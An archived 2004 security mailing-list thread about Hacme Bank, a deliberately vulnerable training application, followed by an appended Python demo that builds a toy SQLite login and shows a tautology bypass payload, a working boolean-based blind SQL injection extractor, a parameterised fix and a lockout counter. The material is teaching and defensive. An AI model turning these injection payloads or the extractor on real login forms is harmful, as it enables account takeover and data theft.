RE: Hacme Bank

From: Mark Curphey (mark@curphey.com)
Date: Fri Sep 10 2004 - 00:49:08 EDT


Glad you liked the blind SQL injection;-) My personal fav is the poor crypto one in the account fields which is seen all too often in the real world but rarely found.

After 5 (I think) bad attempts we reset your session, which would see any subsequent request redirected to the login page. It may be that. Try and send me the results off-line (so we avoid support on webappsec) and we can fine-tune any configs or make changes if you have found a bug.

Cheers

Mark

---- Jeremy Junginger <jj@act.com> wrote:
>
> Great tool! Lesson 1 is a nice way to integrate the nexgenss advanced SQL
> injection techniques into a simulated environment. I have a question,
> though, and it may be misconfiguration on the server side on my part, but
> after I've logged in successfully with inserted account credentials and I
> click on account details, I get thrown back to
> http://redmrtg/hacmebank/Login.aspx?lmsg=Re-login Any tips? Thanks!
>
> -----Original Message-----
> From: Rush Molekilla [mailto:molekilla@gmail.com]
> Sent: Thursday, September 09, 2004 6:28 AM
> To: Mark Curphey
> Cc: webappsec@securityfocus.com; pen-test@securityfocus.com
> Subject: Re: Hacme Bank
>
>
> Nice app!
>
> The only problem I had while trying to hack an ASP.NET application on localhost
> with my tool (Ecyware GreenBlue Inspector) is that both use the .NET thread
> pool.
>
> But nice ASP.NET, super great.
>
> Thanks,
>
> Rogelio Morrell C.
> Ecyware
>
>
> On Wed, 8 Sep 2004 10:03:43 -0400, Mark Curphey <mark@curphey.com> wrote:
> > Just to let you know in the next hour or so the links should go live
> > to our new free tool, Hacme Bank on the Foundstone web site
> > (http://www.foundstone.com/s3i).
> >
> > You can see the press release here;
> >
> > http://www.tmcnet.com/usubmit/2004/Sep/1071232.htm
> >
> > It's an online banking application written in C# ASP.NET (requires IIS
> > and .NET framework 1.1 to install) with a set of security holes
> > replicating real world things we have found in client engagements over
> > the last 9 months. It serves as a "real world" training application
> > for web application pen testing and education for developers.
> >
> > It's free for non-commercial use and we are already working on the next
> > version to include some more user management issues.
> >
> > All of the lessons are screen captured and documented so you can step
> > through all of the issues. These are in a "User and Solution Guide"
> > PDF in the web root by default.
> >
> > It is not designed to be a good benchmarking platform for automated
> > tools but it is interesting to compare the results of your favorite
> > tools with the holes in the bank (we have done this) or put it behind
> > a "web app firewall" (no uptake from my recent challenge I am afraid,
> > go figure!).
> >
> > The experienced can start attacking the login field when installed and
> > the less experienced can walk through the lesson plans.
> >
> > Mark
> >
> >
>
>
>
> ------------------------------------------------------------------------------
> Ethical Hacking at the InfoSec Institute. All of our class sizes are
> guaranteed to be 12 students or less to facilitate one-on-one interaction
> with one of our expert instructors. Check out our Advanced Hacking course,
> learn to write exploits and attack security infrastructure. Attend a course
> taught by an expert instructor with years of in-the-field pen testing
> experience in our state of the art hacking lab. Master the skills of an
> Ethical Hacker to better assess the security of your organization.
>
> http://www.infosecinstitute.com/courses/ethical_hacking_training.html
> -------------------------------------------------------------------------------
>
>
>

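The two behaviours discussed in this thread, the login-field SQL injection of Lesson 1 and the session reset after roughly five bad login attempts that Mark describes, modelled as an added example. This is not Hacme Bank's code: the SQLite table, column names, user records, the plaintext password storage and the lockout threshold of 5 are all constructed for the demo. It shows the string-concatenated login query a tester exploits, the tautology bypass, a boolean-based blind extraction that uses only login success/failure as its oracle, the parameterised query that closes the hole, and why a per-session failed-attempt counter cuts the blind extraction short.

```python
"""
Added example (not Hacme Bank's code): a login backed by an in-memory SQLite
database, attacked by tautology bypass and boolean-based blind SQL injection,
beside the parameterised version and a modelled session-reset lockout.
All table/column names, records and the threshold of 5 are constructed.
"""
import sqlite3
import string


class SessionReset(Exception):
    """Models the server dropping the session after too many bad logins,
    after which every request is redirected to the login page."""


def make_db():
    # Constructed sample data; real passwords would of course be hashed.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_name TEXT, password TEXT, account_no TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("jv", "jv789", "5204320422040001"),
        ("jm", "jm789", "5204320422040002"),
    ])
    return conn


def login_vulnerable(conn, user_name, password):
    # Vulnerable: untrusted input concatenated straight into the SQL text.
    sql = ("SELECT user_name FROM users WHERE user_name = '%s' AND password = '%s'"
           % (user_name, password))
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None          # syntax errors from a probe look like a failed login
    return row[0] if row else None


def login_fixed(conn, user_name, password):
    # Hardened: bound parameters, so input can never change the query structure.
    sql = "SELECT user_name FROM users WHERE user_name = ? AND password = ?"
    row = conn.execute(sql, (user_name, password)).fetchone()
    return row[0] if row else None


def blind_extract(login, conn, column, row_user, max_len=32):
    """Boolean-based blind extraction. The only oracle is whether the login
    succeeds; each probe asks 'is character N of <column> for <row_user>
    equal to c?' and stops when no character matches (end of the value)."""
    alphabet = string.digits + string.ascii_letters
    out = ""
    for pos in range(1, max_len + 1):
        found = None
        for c in alphabet:
            probe = ("jv' AND substr((SELECT %s FROM users WHERE user_name='%s'),%d,1)='%s' --"
                     % (column, row_user, pos, c))
            if login(conn, probe, "x") is not None:
                found = c
                break
        if found is None:
            break
        out += found
    return out


def with_lockout(login, threshold=5):
    """Wrap a login function with a per-session failed-attempt counter
    (threshold of 5 is an assumption taken from Mark's message)."""
    state = {"failures": 0}

    def guarded(conn, user_name, password):
        if state["failures"] >= threshold:
            raise SessionReset("session reset; redirect to the login page")
        result = login(conn, user_name, password)
        state["failures"] = 0 if result is not None else state["failures"] + 1
        return result

    return guarded


if __name__ == "__main__":
    db = make_db()
    print("bypass:", login_vulnerable(db, "jv' --", "anything"))
    print("jm account:", blind_extract(login_vulnerable, db, "account_no", "jm"))
    print("fixed bypass:", login_fixed(db, "jv' --", "anything"))
    try:
        blind_extract(with_lockout(login_vulnerable), db, "account_no", "jm")
    except SessionReset as e:
        print("lockout:", e)
```

The single-shot bypass (`jv' --`) succeeds on the first request and so never trips the counter; the blind extraction needs dozens of failed logins per character and is cut off after the fifth miss, which is the "thrown back to the login page" effect reported above. Against the parameterised login every probe is just a user name that does not exist, and the extraction returns nothing.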



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:05 EDT